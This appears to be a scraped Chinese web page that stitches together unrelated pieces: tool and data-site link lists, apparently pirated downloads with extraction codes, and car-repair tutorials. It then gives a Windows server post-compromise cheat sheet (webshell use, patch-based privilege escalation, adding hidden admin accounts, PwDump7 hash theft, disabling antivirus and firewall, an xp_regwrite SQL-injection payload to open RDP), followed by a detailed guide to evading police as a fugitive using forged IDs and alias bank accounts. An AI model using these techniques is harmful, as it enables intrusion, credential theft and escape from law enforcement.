腾讯云分析：http://mta.qq.com/
51.la：http://www.51.la/
网络数据采集工具
八爪鱼：http://www.bazhuayu.com/
集搜客：http://www.gooseeker.com/
火车采集器：http://www.locoy.com/
其他数据网

媒体微博排行榜：http://v6.bang.weibo.com/xmt
新媒体排行榜：http://www.newrank.cn/
友盟：http://www.umeng.com/
中国新闻地图：http://vis.360.cn/open/cnnews/
中国票房榜：http://www.cbooo.cn/
收视率排行：http://www.tvtv.hk/archives/category/tv
农业大数据云平台：http://www.dataagri.com/agriculture/gis.action
房价指数：http://industry.fang.com/
中国统计局：http://data.stats.gov.cn/
CEIC：http://www.ceicdata.com/zh-hanswind
（万得）：http://www.wind.com.cn/
中国主要城市拥堵排名：http://report.amap.com/traffic/
中国综合社会调查：http://www.chinagss.org/
中国P2P网贷指数：http://www.p2p001.com/wdzs/wdzs_p2pline.html
易车汽车指数：http://index.bitauto.com/
旅游预测：http://trends.baidu.com/tour/
思维导图制作软件/网站
思维导图逻辑性强，能够构建起让人一目了然的框架，简单而又方便阅读记忆，是罗列重点、大纲的重要工具，推荐以下思维导图制作工具：
XMind思维导图软件：http://www.xmindchina.net/（软件）
Mindjet思维导图软件：http://www.mindmanager.cc/（软件）
FreeMind思维导图：http://freemind.en.softonic.com/（软件）
iMindMap思维导图软件：http://www.imindmap.cc/（软件）
百度脑图：http://naotu.baidu.com/（在线）
MINDPINTEAM：http://mindmap.4ye.me/（在线）
Mindomo：https://www.mindomo.com/zh/（在线需注册）
ProcessOn：https://www.processon.com/（需注册）
PPT模板工具

无忧PPT：http://www.51ppt.com.cn/
瑞普PPT论坛：http://www.rapidbbs.cn/
pptstore：http://www.pptstore.net/
51PPT模板：http://www.51pptmoban.com/ppt/
第1PPT：http://www.1ppt.com/
站长之家：http://sc.chinaz.com/ppt/
设计师网址导航：http://www.userinterface.com.cn/

[caption id="attachment_2370" align="alignnone" width="821"] 2016我赢职场WEB前端开发视频教程[/caption]

[caption id="attachment_2364" align="alignnone" width="552"] 【春节福利】2017年二级建造师全套考试资料（含5个专业+2科公共科）200G[/caption]

好不容易弄得 弄了一小天AE模板，婚礼影楼专用，送给喜欢做AE的兄弟姐妹。喜欢的话给点热心值，祝福大家新年快乐啊。
链接：http://pan.baidu.com/s/1gfuWahd
提取码：[tinr2v]90yx[/tinr2v]
[caption id="attachment_2360" align="alignnone" width="1732"] 【 AE模板】 『 80套经典高端婚庆模』[/caption]

[caption id="attachment_2353" align="alignnone" width="1885"] 浪漫表白网页自带BGM[/caption]2017年新年的来临，如果你还单身那就快点做一个表白网站给你心爱的人吧。

这里祝大家2017年新年快乐，以及2017年大家都可以脱单。

下载地址：https://share.weiyun.com/55196ba30e0143674e1624d80c6e4f56

[caption id="attachment_2349" align="alignnone" width="986"] 微信公众平台接口二次开发搭建教程[/caption][caption id="attachment_2350" align="alignnone" width="990"] 微信公众平台接口二次开发搭建教程[/caption][caption id="attachment_2351" align="alignnone" width="980"] 微信公众平台接口二次开发搭建教程[/caption]

[callout class="info或warning或danger" title=""][/callout]链接: http://pan.baidu.com/s/1o8TnBZk 密码: uieq

祝：
所有人都能在新的一年万事如意，身体健康，心想事成，钱多多！

[caption id="attachment_2329" align="alignnone" width="1080"] 某宝卖的各类车维修技术教程大全打包[/caption]
富康轿车电喷系统检测与维修 链接: http://pan.baidu.com/s/1qWDTfZ2 密码: yg1v

捷达电喷系统检测与维修 链接: http://pan.baidu.com/s/1c0llsmW 密码: rsk6

桑塔纳2000GSI电喷系统检测与维修 链接: http://pan.baidu.com/s/1jGgVsNW 密码: pfr1

雅阁电喷系统检测与维修 链接: http://pan.baidu.com/s/1bnDDATD 密码: trhq

电控发动机波形分析视频教程 链接: http://pan.baidu.com/s/1jG6DKCA 密码: 7c8x

魏俊强电控发动机故障诊断高级讲解 链接: http://pan.baidu.com/s/1qWp68pA 密码: sy4b

朱军电控发动机波形分析 链接: http://pan.baidu.com/s/1qFbmI 密码: zpq6

朱军电控发动机原理与诊断 链接: http://pan.baidu.com/s/1sjLYArN 密码: 1peg

东风牌D6114型柴油机使用技巧 链接: http://pan.baidu.com/s/1gdfF5QV 密码: nsub

丰田普锐斯原厂技术培训视频(英文) 链接: http://pan.baidu.com/s/1c02MnW8 密码: vekr

跟我学汽车养护 链接: http://pan.baidu.com/s/1dDAlLxZ 密码: 5g67

金奔腾汽车电脑解码器使用方法 链接: http://pan.baidu.com/s/1bn99TYR 密码: gjif

汽车必需设施的安装 链接: http://pan.baidu.com/s/1dDvsB9f 密码: a8ej

汽车电器与电子控制技术 链接: http://pan.baidu.com/s/1hqivuMo 密码: 68ji

摩托车维修技术 链接: http://pan.baidu.com/s/1FH8vG 密码: driv

奥迪A6电喷系统的原理与检测 链接: http://pan.baidu.com/s/1ntmoRTR 密码: 5cbx

电喷系统结构原理及故障诊断 链接: http://pan.baidu.com/s/1kT7rFIv 密码: mmp5

都市先锋-捷达王-捷达轿车电喷系统检修 链接: http://pan.baidu.com/s/1sjNu6z7 密码: x9ft

汽车电子技术与检测仪器的应用 链接: http://pan.baidu.com/s/1bnoBfFh 密码: 5haq

汽车各部件工作原理视频 链接: http://pan.baidu.com/s/1qW3JIt2 密码: jkwf

汽车故障高级诊断技术 链接: http://pan.baidu.com/s/1eQjLvns 密码: e4tr

汽车故障诊断基本思路 链接: http://pan.baidu.com/s/1c0sCR0c 密码: v6g4

汽车驾驶学习技巧 链接: http://pan.baidu.com/s/1i3grxHV 密码: hmda

汽车喷漆涂装技术 链接: http://pan.baidu.com/s/1qWxEbMk 密码: 6tnd

汽车音响防盗 气囊修复 仪表芯片解密 链接: http://pan.baidu.com/s/1sjyXV8h 密码: 7gej

汽车在途中常见故障应急修理 链接: http://pan.baidu.com/s/1gdjJqp1 密码: rbsc

汽车专业英语视频教程 链接: http://pan.baidu.com/s/1gdjJqpH 密码: mt6e

数据流分析方法视频教程 链接: http://pan.baidu.com/s/1kTEJqUr 密码: zjkq

现代汽车电控系统诊断新理念 链接: http://pan.baidu.com/s/1mgFxmbA 密码: mnkr

蓄电池修理技术视频教程 链接: http://pan.baidu.com/s/1mg04cFQ 密码: 2yn3

玉林YC4110ZQ柴油机装配工艺 链接: http://pan.baidu.com/s/1sjG8P21 密码: 7pct

朱军自动变速器原理与诊断 链接: http://pan.baidu.com/s/1i3grxIH 密码: x95p

自动变速器结构原理与检修 链接: http://pan.baidu.com/s/1ygCV0 密码: 37k4

通用五菱汽车维修视频 链接: http://pan.baidu.com/s/1mgMOHks 密码: fxgj

现代伊兰特维修视频 链接: http://pan.baidu.com/s/1gd4HZt5 密码: 82ry

新编电动自行车维修速成 链接: http://pan.baidu.com/s/1o6tEwS6 密码: u354

玉林YC6105柴油机的装拆与维修 链接: http://pan.baidu.com/s/1sjHUOMh 密码: 8wrc

自动变速箱维修视频教程 链接: http://pan.baidu.com/s/1kTKiXrp 密码: tem3

液晶电视维修教程 链接: http://pan.baidu.com/s/1i37vKxv 密码: nms4

电动车维修视频教程 链接: http://pan.baidu.com/s/1mgxMox6 密码: i648

跟我学汽车美容 链接: http://pan.baidu.com/s/1jGMmNUu 密码: 5efm

汽车美容视频教程 链接: http://pan.baidu.com/s/1dDo7fBN 密码: pjuh

汽车美容与装饰 链接: http://pan.baidu.com/s/1dD1yorn 密码: meg7

汽车内外饰物的安装 链接: http://pan.baidu.com/s/1qWyZY3M 密码: zdeu

本田汽车维修视频 链接: http://pan.baidu.com/s/1dDEp6Xr 密码: 7n9i

大众汽车维修视频 链接: http://pan.baidu.com/s/1hqvm7Ta 密码: 2vz2

大众自动变速器构造原理与维修 链接: http://pan.baidu.com/s/1gdlflBl 密码: hu7c

国产轿车维修跟我学 链接: http://pan.baidu.com/s/1qWxEbMG 密码: faf1

机修技师中高级视频教程 链接: http://pan.baidu.com/s/1eQfHAlO 密码: vg7w

轿车维修文字教程 链接: http://pan.baidu.com/s/1ntwypg1 密码: ehuc

捷达车系维修技术 链接: http://pan.baidu.com/s/1nt3jRjb 密码: 983y

汽修电工视频教程 链接: http://pan.baidu.com/s/1pJNy9cv 密码: s1ry

汽修手册文字资料 链接: http://pan.baidu.com/s/1pJmQMBT 密码: 24nq

汽修专家讲汽修视频教程 链接: http://pan.baidu.com/s/1jGELtTc 密码: rqe1

汽车车身修复教程 链接: http://pan.baidu.com/s/1c032kvu 密码: yfnb

汽车电脑工作原理与检修 链接: http://pan.baidu.com/s/1c0cxPrM 密码: 94dt

汽车机修教学视频教程 链接: http://pan.baidu.com/s/1mgosNk0 密码: m3ge

汽车维修高级工培训视频教程 链接: http://pan.baidu.com/s/1pJwujcn 密码: wbj1

汽车维修工中高级视频教程 链接: http://pan.baidu.com/s/1c0pUY0C 密码: un2m

汽车维修技师技能训练教程 链接: http://pan.baidu.com/s/1ntpCDZV 密码: jqyd

汽车维修技术视频教程 链接: http://pan.baidu.com/s/1c00ewNY 密码: tmd4

汽车维修职业技能培训教材 链接: http://pan.baidu.com/s/1pJ1dRMr 密码: 88vs

汽车维修自学通视频教程 链接: http://pan.baidu.com/s/1eQB5FvO 密码: cc2b

【1.能不能执行cmd就看这个命令：net user，net不行就用net1，再不行就上传一个net到可写可读目录，执行/c c:windowstempcookiesnet1.exe user

2.当提权成功，3389没开的情况下，上传开3389的vps没成功时，试试上传rootkit.asp 用刚提权的用户登录进去就是system权限，再试试一般就可以了。

3.cmd拒绝访问的话就自己上传一个cmd.exe 自己上传的后缀是不限制后缀的，cmd.exe/cmd.com/cmd.txt 都可以。

4.cmd命令：systeminfo，看看有没有KB952004、KB956572、KB970483这三个补丁，如果没有，第一个是pr提权，第二个是巴西烤肉提权，第三个是iis6.0提权。

6.c:windowstempcookies  这个目录

7.找sa密码或是root密码，直接利用大马的文件搜索功能直接搜索，超方便！

8.cmd执行exp没回显的解决方法：com路径那里输入exp路径C:RECYCLERpr.exe，命令那里清空(包括/c )输入”net user jianmei daxia /add”

9.增加用户并提升为管理员权限之后，如果连接不上3389，上传rootkit.asp脚本，访问会提示登录，用提权成功的账号密码登录进去就可以拥有管理员权限了。

10.有时变态监控不让添加用户，可以尝试抓管理哈希值，上传“PwDump7 破解当前管理密码(hash值)”，俩个都上传，执行PwDump7.exe就可以了，之后到网站去解密即可。

11.有时增加不上用户，有可能是密码过于简单或是过于复杂，还有就是杀软的拦截，命令 tasklist 查看进程

12.其实星外提权只要一个可执行的文件即可，先运行一遍cmd，之后把星外ee.exe命名为log.csv 就可以执行了。

13.用wt.asp扫出来的目录，其中红色的文件可以替换成exp，执行命令时cmd那里输入替换的文件路径，下面清空双引号加增加用户的命令。

14.提权很无奈的时候，可以试试TV远控，通杀内外网，穿透防火墙，很强大的。

15.当可读可写目录存在空格的时候，会出现这样的情况：’Cocuments’ 不是内部或外部命令，也不是可运行的程序 或批处理文件。解决办法是利用菜刀的交互shell切换到exp路径，如：Cd Cocuments and SettingsAll UsersApplication DataMicrosoft 目录 然后再执行exp或者cmd，就不会存在上面的情况了，aspshell一般是无法跳转目录的～

16.有时候可以添加用户，但是添加不到管理组，有可能是administrators改名了，net user administrator 看下本地组成员，*administrators

17.进入服务器，可以继续内网渗透  这个时候可以尝试打开路由器 默认帐号密码 admin  admin

18.有的cmd执行很变态，asp马里，cmd路径填上面，下面填：””c:xxxexp.exe “whoami”  记得前面加两个双引号，不行后面也两个，不行就把exp的路径放在cmd那里，下面不变。

19.一般增加不上用户，或是想添加增加用户的vbs,bat,远控小马到服务器的启动项里，用“直接使服务器蓝屏重启的东东”这个工具可以实现，

20.执行PwDump7.exe抓哈希值的时候，建议重定向结果到保存为1.txt /c c:windowstempcookiesPwDump7.exe >1.txt

21.菜刀执行的技巧，上传cmd到可执行目录，右击cmd 虚拟终端，help 然后setp c:windowstempcmd.exe 设置终端路径为：c:windowstempcmd.exe

22.当不支持aspx，或是支持但跨不了目录的时候，可以上传一个读iis的vps，执行命令列出所有网站目录，找到主站的目录就可以跨过去了。 上传cscript.exe到可执行目录，接着上传iispwd.vbs到网站根目录，cmd命令/c “c:windowstempcookiescscript.exe” d:webiispwd.vbs

23.如何辨别服务器是不是内网？
192.168.x.x    172.16.x.x    10.x.x.x

(( dos命令大全 ))
查看版本：ver 查看权限：whoami
查看配置：systeminfo 查看用户：net user
查看进程：tasklist
查看正在运行的服务：tasklist /svc
查看开放的所有端口：netstat -ano
查询管理用户名：query user
查看搭建环境：ftp 127.0.0.1
查看指定服务的路径：sc qc Mysql
添加一个用户：net user jianmei daxia.asd /add
提升到管理权限：net localgroup administrators jianmei /add
添加用户并提升权限：net user jianmei daxia.asd /add & net localgroup administrators jianmei /add
查看制定用户信息：net user jianmei
查看所有管理权限的用户：net localgroup administrators
加入远程桌面用户组：net localgroup “Remote Desktop Users” jianmei /add
突破最大连接数：mstsc /admin /v:127.0.0.1
删除用户：net user jianmei /del
删除管理员账户:net user administrator daxia.asd
更改系统登陆密码：net password daxia.asd
激活GUEST用户：net user guest /active:yes
开启TELNET服务：net start telnet
关闭麦咖啡：net stop “McAfee McShield”
关闭防火墙：net stop sharedaccess
查看当前目录的所有文件：dir c:windows
查看制定文件的内容：type c:windows1.asp
把cmd.exe复制到c:windows的temp目录下并命名为cmd.txt：copy c:windowstempcookiescmd.exe c:windowstempcmd.txt

开3389端口的命令：REG ADD HKLMSYSTEMCurrentControlSetControlTerminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f 查看补丁：dir c:windows>a.txt&(for %i in (KB952004.log KB956572.log KB2393802.log KB2503665.log KB2592799.log KB2621440.log KB2160329.log KB970483.log KB2124261.log KB977165.log KB958644.log) do @type a.txt|@find /i “%i”||@echo %i Not Installed!)&del /f /q /a a.txt (( SQL语句直接开启3389 ))

3389登陆关键注册表位置：HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminalServerDenyTSConnections 其中键值DenyTSConnections 直接控制着3389的开启和关闭，当该键值为0表示3389开启，1则表示关闭。 而MSSQL的xp_regwrite的存储过程可以对注册进行修改，我们使用这点就可以简单的修改DenyTSConnections键值，从而控制3389的关闭和开启。

开启3389的SQL语句： syue.com/xiaohua.asp?id=100;exec master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,’SYSTEMCurrentControlSetControlTerminal Server’,’fDenyTSConnections’,’REG_DWORD’,0;–

关闭3389的SQL语句： syue.com/xiaohua.asp?id=100;exec master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,’SYSTEMCurrentControlSetControlTerminal Server’,’fDenyTSConnections’,’REG_DWORD’,1;–
(( 常见杀软 ))

360tray.exe  360实时保护 ZhuDongFangYu.exe  360主动防御 KSafeTray.exe  金山卫士 McAfee McShield.exe  麦咖啡 SafeDogUpdateCenter.exe  服务器安全狗

第一条,跑路过程中的通讯 
1,最大的忌讳,用手机 
      手机虽然作为很先进的通讯工具,方便了联络,但是在跑路途中,这个确是最大的安全隐患,一个电话可能你就会被KO掉了。可能有的朋友会说,你说的是因为手机卡是用你身份证办的吧,你可以办那种不用身份证办的电话卡啊,或者是用别人的身份证办的卡啊。问题不在这里,而是目前的手机定位情况,如果真的是犯了比较大的事情,一般你的手机肯定会被锁定的,包括你的通话和短信。至于定位,一般开机40秒之内定位你没什么问题。可能又有不懂的童鞋要问了,我又没有打电话,怎么会定位我呢?不知道你们有没有用过Googlemap的定位功能,或者是AGPS,这个给手机没有GPS功能的朋友带来了很多方便,可以实时定位你的位置……,这个的实现其实是基于手机信号发射站来定位的,多维定位法,一般精确度在300-400米范围内,你所处位置的基站越多,定位越精确,只要你手机开机,有信号,基站就会不断扫描你手机信号源,然后多维定位。所以……跑路过程中最好是不要使用手机通讯,否则你很快就会被锁定……。可能你在美国大片中经常看到有人打电话然后被锁定在某个建筑内,这当然不是危言耸听。我不知道他们是不是基于手机基站扫描定位,我想可能还有卫星定位技术在里面吧, 不管怎么样,手机还是不用为妙。
      每个手机都有移动设备识别码，IMEI码是唯一的.当你手机接入通信网络时，通过手机的IMEI码，就可以对你的手机进行识别，监视，录音，定位等，所以一定要同时换手机和卡的，不能只换卡而不换手机.
因为中国的山寨手机共用一个移动设备识别码，而导致巴基斯坦情报部门难以监控恐怖分子的手机通信.
 
2,固定电话联系方式 
      很多人之所以被抓,可能就是因为实在想家,用固定电话给家里打了个电话。然后很快就被KO掉了。固定电话不具备移动性,一般打电话都会显示区号,然后根据这个区号,再去当地电信查,很快就能具体到某一不电话机。可能又有朋友要问了,我用街道旁边的IC卡公用电话,总找不到我吧,这个,实在的说,更好找到你的大致位置了,街边的IC卡公用电话都是分段号码,并且在电信里直接有分布图,根据你的电话号码,很快就能追踪到你所使用的那部电话所在的街道名称和位置……,这样你的位置还是会被暴露,给跑路带来风险。
 
总结: 跑路过程中的通讯解决方案
      可以找到当地的中学生或者是去网吧找个,给他一些钱,让他打电话给另外个城市的朋友或者网友,当然,距离越远越好,然后通过他再转告给你想联系的人,如果为了更安全,可以多跳转几次。这样即使追查起来,想找到你的位置,可能在某个环节就会断掉。
 
第二条,跑路过程中的交通
      跑路,当然是要跑了,跑的越隐蔽越好,越少人知道越好,越快也越好。所以交通是很重要。
交通无非就是海陆空,机场车站,码头,或者自己开车或者驴车马车牛车都可以。没有做不到,只有想不到。
      首先,坐飞机跑路这个是首先要排除掉的,机场人员众多,安全检查有是最严密的。pol.ice叔叔安排的数量也是最多的。身份核查也是最严密的,身份证 识别是和公共安全专家局的那个身份证识别系统是联网的,去机场坐飞机跑路等于自投罗网。聪明人一般都不会坐飞机跑路。
      其次,坐火车跑路,这个也是很不明智的选择。火车站现在安检级别也升级了,火车站内监控众多。虽然说火车站人多,置身其中还是相对安全的说,但是门口中总有 pol.ice叔叔在那里查身份证,看到可疑人员就会让你掏出身份证在电脑上查询一下(□□□,插播一条新闻,本人每次坐火车基本上都会被视为可疑对象查身份证),所以这个路线也不是很安全的,万一被pol.ice叔叔查身份证,那当场就挂了。不推荐
关于坐汽车跑路,汽车又分长途和短途汽车,长途汽车一般发车目的明确,距离虽然远,一般都是走高速公路,但是可能就在几个地方停,所以万一暴露始发地点,目的地很快就会暴露,缩小pol.ice叔叔的追捕范围。但是长途汽车暴露时间短,接触的人也少,这个可以适当考虑,当然,坐长途汽车,你可以不到达目的地下车,可以在某一路段下车,然后在路上拦一些跑长途的货车,搭个顺风车,有钱的话适当的给车主一些钱,他们还是乐意带你的,当然,这个要看人品和运气了。短途汽车,安检比较松一些,目的地短,经常换乘,迂回主动性比较强,但是由于暴露时间长,接触的人多,人多眼杂,也容易被发现,需慎重考虑……
      另外一个走公路考虑的就是租车,找个人给他一些钱,去租赁公司租一辆车,走小路开,这样暴露的可能性就很小,安全系数高一些,这个是公路最佳出行方案……
      走水路,全国跑路要走水路的地方貌似不多,内陆无非就是从重庆到珠江三角洲走水路,外围就是从广西,湛江,珠海,广州,青岛,南京,天津,海南,大连等城市坐船,不过这个危险系数高,非常,极度不推荐……
 
第三,跑路中的身份伪造
 
    跑路过程中一定不能用自己的真实身份证,这样很快就会被pol.ice叔叔盯上的。在外面不管住店还是什么的,都是需要身份证的。至少要有三张或者三张以上身份证。至于身份证的来源,大致有两种。办证广告遍布全国各地,更有亚洲办证集团公司,每个城市的天桥下都有专门给人办证的,只要你想要的,没有办不出来的,50块钱一张身份证,200块钱办的比真的都还真,随便花点钱,都可以给你办出来一打。另外一个就是找你当地的贼头,这个需要一些关系,他们手头一般都有别人的身份证,花点钱,从他们手里买个两三张真正的身份证还不是什么问题的,当然,要找和你长的比较相近的,年龄差别不大的,不要连性别都搞混淆了。
 
第四,跑路过程中的住
       跑路绝对是一个长期的过程,在这里肯定要考虑到住。你不能一直在路上跑啊,总有累的时候,需要一个落脚点。住当然是短期的住,跑路不可能在一个地方呆的时间太长,除非是绝对的安全,当然绝对的安全是不存在的。首先住有几点方案推荐：
      1. 对于经济条件和安全性来考虑,3星级以上的宾馆推荐住,因为这些地方一般都是比较正规的地方。一般不会有pol.ice过去查房或者抓赌博P C什么的,星级越高,安全系数越高,有些地方的五星级宾馆一般都是go-vern-ment招待单位,除非有特殊情况,否则pol.ice叔叔是不会贸然去查房的。另外一个就是当地go-vern-ment招待所或者宾馆,这些地方,pol.ice也是避之不及的。安全系数更高。不过要注意尽量避开监控设备,最好带着帽子什么的进去,用假身份证开房。
      2.就是大一点的洗浴中心之类的娱乐场所,这些地方, 一般都是有社会背景的人开的,越大,后台越硬。这些地方一般都提供免费住宿,因为是洗浴的地方,只有入口等处有监控设备,其他的地方不会有的,进去洗浴又不需要身份证,降低了安全风险,何况里面吃喝洗住玩一条龙服务,在里面呆上十天半个月,没人会管你的,不过建议还是不要常呆,否则引起怀疑,会带 pol.ice过来找你的。
      3. 找一些农家乐,现在的很多农家乐都提供住宿服务,当然农家乐里面不会有监控什么的,管理上虽然登记但是和其他地方相比,还是要松懈的多,pol.ice也一般不会没事跑那么远去查房,在里面住上三五天,还不是什么问题,何况农家乐一般都远离市区和农村,信息交流不是那么及时,安全性相对较高……
      4. 一些小旅馆之类的不推荐入住,因为这个会经常被pol.ice叔叔查房,另外人多眼杂,安全系数极度不高,不过学校周围的小旅馆相对来说安全一些,因为毕竟里面都是开房的学生居多。pol.ice叔叔也是心知肚明,除非是缺钱花了或者是学校联手想去查房,否则一般不会去的,可以考虑短期入住。
      5.最落魄最省钱的住,可以考虑和流浪汉或者拾荒者住在烂尾楼或者桥洞下面,一般城市都有烂尾楼,里面一般都聚集这流浪汉或者拾荒者。这里一般情况下 pol.ice是不会清查的,何况一般的烂尾楼外面都是大门紧锁。突然多出来一两个陌生人,他们也不会过多关注,只要你不和他抢地盘,他是不会找你麻烦的,也没人想招惹麻烦,所以在那里呆上十天半个月,相对来说还是比较安全的,这种方式推荐落魄期住……

      再者:
      1. 不要用过去的邮箱、QQ、博客 、手机号，论坛id等带有个人特征的东西，非要打开，去网吧上网， 务必远离居住地，时间不超过30分钟。
2. 不要使用手机和任何以前认识人的联系，避免被监控并通过手机定位。 如果想家人，忍耐是最重要的，因为他们是被监控最彻底的，实在忍不住，应到居住地500公里外，最好跨省打公用电话给他们，切记时间也不能太长，因为公话时间长了也会暴露。 
3. 自己名下的银行卡，打折卡，贵宾卡千万不要用，很多是全国联网，都有摄像头，一旦取钱或消费，很容易被经侦人员锁定，暴露行踪。强烈建议办4-6张化名银行卡，全部开通网银，跑路时将所带钱款分别存入带拉链的贴身内裤，冬天的夹克夹层，肩上的包裹，拉杆箱中，裤子钱包内，即使路上被歹人打劫，不至于一锅端导致身无分文，且可以迅速通过网银将被劫银行卡中资金转移到你剩余的卡上。
4. 衣服穿最普通的一种，以前刮胡子，现在就蓄须，以前长发，现在就平头，戴副眼镜，如果近视，换成有色近视镜，随身现金不要超过1000，绝对够用了。硬币、小额纸币一定要足够，车站码头等人流密集的地方，买烟，吃盒饭，买地图，报纸等等小额消费千万不要用百元大钞，最大限度降低你被别人关注的可能。
5. 记住几个你周围熟人的身份证，同事、邻居、同学等，要年龄，体貌差不多的，而且他们都是绝对老实人，没有任何案底甚至没有银行不良信用记录，一辈子也不会上警察的追捕名单，按照他们的信息做几张，也不要长期用一张，轮流用，万一被人盘问，你用假名也可以对答如流。
6. 不要迷信越危险的地方越安全，你看电视上的法制节目，至少70%以上家伙都是在家乡附近不超过500公里地域范围被抓获的，所以要有至少3-5年不回家乡省份甚至临近省份的思想准备。
7. 出行住宿登记，一般就说自己身份证被盗，报个家乡绝对良民的号码就行了，只要网上验证身份证号码对，多数不细查，更何况很多小宾馆根本不具备查验能力，实在不行就去休闲洗浴城，那里不查身份证，洗个澡，睡一觉，不找小姐的话，消费也不贵，不到万不得已不要用假身份证，很多人就是栽在假证上，其实不挂星级的根本不用，给钱就好了，前提是你不能给人你是罪犯的印象，最好的办法是带着拉杆箱和一个旅行背包（老外常备的那种，上面塞一瓶水）
   8. 不要在旅馆里不出门。那样容易被怀疑。早出晚归。去网吧看看有没有警方的侦察动向报道，看看家乡论坛上有没有关于你的帖子，以确定下一步计划，好多人都说不要去人多的地方，特别是出事（案发）的头两个月，我的观点是相反，人潮涌动的地铁站，购物街是最佳藏匿点，没有警察会在闹市区人流中查身份证，另外如果被私家侦探跟踪，可以非常迅速的逃逸。 
9. 长途出行切记随身带一本全国地图，最好后面附有公路里程和列车时刻表，很多小城市售票厅墙上的简易地图不足以给你的跨省出行足够指导，强烈建议购买地质出版社的中国公路铁路地图册。和谐号，特快，中长途客运汽车是最佳选择。不能直达，一定要转车。因为运气不好的话，你的举动会被售票窗口摄像头监控，你的车票信息会被警方侦之，可能你还没下车，警察就在出站口等你了。比如你要从武汉到广州去，不要买直达，买到长沙就行了，从长沙坐汽车到株洲，再株洲到广州，两次车一转，这条线索就断了，谁也不知道你到了广州。
10. 尽量坐汽车，最好转一次车，就到了另一个省，坐汽车第一个目的地不要有意识，碰到什么车，就上什么车，装成老江湖，不要长时间在车站东张西望，以免被关注。不要坐飞机，身份证和安检就要了你的命。也不要坐火车，车上乘警和入口处的警察也查身份证。
11. 一定要走铁路的话，不妨先做和谐号到二线城市再转车。在火车站要想不被查验身份证，只有走和谐号专用候车通道或者城际特快。实在不行你还可以坐拉客的黑车，凑够3-5个人就走哦，一般最远不超过300公里，走高速，没有身份检查，老江湖可以考虑，新手不推荐。
12. 路途中能不说最好不说，说话尽量普通话，避免带有家乡口音，见到千里之外的老乡不要激动，不要急于攀谈，他可能认识你拐弯没脚的某个熟人，即使交谈也不要留下行业背景，生活习惯，交友圈子等可能暴露你的信息。 
13. .出事最初的半个月里，不要在任何地方停留超过3天，大跨度、随机性是保证安全的第一要务，避开自己曾去过的任何地方。比如你是湖北人，直奔青海西宁，远离第一现场，3天后折向江苏南京住上不超过两晚。再折向宁波住上两晚，做最新的和谐号直达福建福州，看见警察要镇定，他只是例行公事，不可能认出你，特别是在数千里之外，你越慌他反而越关注你。
14. 出行的身份伪装反差要大，以前是办公室职员，朝九晚五，可以伪装成背包旅行客自助游，商人和小贪官请扔掉你们的名贵西服，把它卖给恶意欠薪的包工头就对了，一身假耐克和伪LV的挎包是你们的不二之选，把手机铃声调成最粗俗的网络歌曲，没事响两下，把名贵手表和戒指放在背包里吧，总之低调。 
15. 跑路的最高境界不是跑，是隐居。所谓大隐隐于市，长期居住地要选在从没去过，外来流动人口多的大城市，你想啊，你在沈阳几十年，几乎不出省，你的亲戚，同窗好友，同事，恩师，朋友，甚至网友，都是东三省及周边，那么警察就不会在上海，成都，广州这些你从来都没去过，又没有熟人的地方做拉网式的排查。千万不要躲到偏远小城镇，那边几十个派出所统一行动，甚至做得到挨户检查，因为外来人口少，你就很显眼，几个老街坊就可以把你出卖了，但大城市外来人口流动密集，满眼都是外地打工者，什么地方口音的都有，你就安全了。
16. 最好整租那种外来大学生，伪小资白领打工聚集的精装修单身公寓，人多，隐蔽，治安又比普通民工聚集的城中村安全许多，为以后重新找工作打下基础，避免坐吃山空，也可避免长期流动住宿频繁使用假身份证的风险，如果有条件，建议选择全封闭物业管理的高档社区，（20-40平方），一般城市不超过2000，大城市不超过3000，空调，冰箱，热水器，洗衣机，宽带，数字电视全备，拎包入住，只要不要再犯罪，便可长期潜伏。
      17. 租房尽量通过网络上的个人，联系房东通过匿名神州行卡，最好是居住地以外较远省份的，提前复印假身份证，就找我上面说的那种你老家的绝对良民，印的时候头像模糊一点，号码清楚就可以了。不要去中介，在中介你会留下你的体貌特征，口音，甚至笔迹，指纹。而在网络，只要你一次性支付半年甚至9个月的租金，房东对你的戒备会降到最低，根本不会想到你是在跑路，房东一旦把房子租出去，都会在网上注明已租出，勿再联系，这条租赁信息一旦无人关注，不出半月就会湮没在网络中，警方无从查证。
18. 一旦有定居点，强烈建议拥有一辆二手自行车，像当地普通工薪族一样，尽量做公交和地铁，如果有月票，那就更逼真了。没事在旧自行车龙头上挂上一兜韭菜和茄子，看到户籍警和联防队朝你走来时，不要躲躲闪闪，直接上去和他说：“可看到你们啦，我车库门口全是小广告，什么办证，枪支，迷药，假币，美女伴游，你们每月收这么贵的物管，好歹管一下啊，这不是让小孩子学坏吗？”如果你能镇定的说出这段话，恭喜你，你的演技已经超越99%的华人演员，可以冲击奥斯卡了。
      19. 居住地最好不要做出租车，很多的哥是警察的眼线，他们很快会被警察找到，说出你在哪里乘车或下车，也许你脸上一颗与众不同的痣会在不经意间出卖了你，万一乘车，也要离目的地一公里外下车。
      20. 出事后警方3天之内会重点排查你的原有社交生活圈子，不出当地县市及周边范围，但是力度很强，几近拉网式；4天以后才可能扩大到省内各市，交通要道，力度中等，因为需要省厅布置协调，地方配合；1周以后会排查到你曾经到过的外省地一级城市，以及外地亲戚，好友，以前同学，网友居住地，这个时候力度已经减弱，如果不是公安部督办的案子，外省警方不会积极买账，通常下发通报应付了事。
21. 7天之内是最危险的，也是最容易被逮到的。建议当天出市，3天出省，一周乾坤大挪移3000公里外，东北的建议到川渝，湖广到东北，沪宁杭到广莞深，广东到中土河南，总之是水土、气候、人文反差越大越好。
22. 基本上30天时间会让警察丧失追捕的信心。40天后他们的日子更难，该做的都做了，每过一天，他们的线索就越少。只要不是大案要案，越往后警察的关注力度越低。这几个月不要急着找小姐，逛夜店，有时候警察扫黄打非也会有意外收获，很多家伙也是栽在这上面，先熬上几个月。
 
补充：
